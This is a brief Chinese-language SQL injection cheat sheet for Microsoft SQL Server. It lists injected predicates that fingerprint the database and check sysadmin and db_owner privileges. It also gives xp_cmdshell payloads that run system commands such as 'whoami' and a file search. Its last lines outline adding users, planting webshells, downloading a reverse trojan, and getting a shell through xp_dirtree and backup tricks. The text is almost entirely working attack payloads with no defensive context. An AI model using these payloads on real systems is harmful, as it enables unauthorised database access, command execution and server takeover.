Microsoft SQL Server 高权限处理

判断数据库及权限

1.and exists (select * from sysobjects) //判断是否是MSSQL
2.and 1=(select @@VERSION) //MSSQL版本
3.And 1=(select db_name()) //当前数据库名
4.and 1=(select IS_SRVROLEMEMBER('sysadmin')) //判断是否是系统管理员（sa）
  and 1=(Select IS_MEMBER('db_owner')) //判断是否是库权限
  and 1= (Select HAS_DBACCESS('master')) //判断是否有库读取权限

sa权限

如果有系统管理员权限则可以通过exec master..xp_cmdshell执行系统命令例如
1.1'; exec master..xp_cmdshell "whoami" --
2.1'; exec master..xp_cmdshell 'dir /s d:/index.asp'--//查找
另外可以添加用户，写webshell，下载反向远程木马；（下载二进制文件如果没有路径可以直接写C:）

db_owner权限处理

利用xp_dirtree查找web物理目录,然后通过log备份和差异备份Getshell；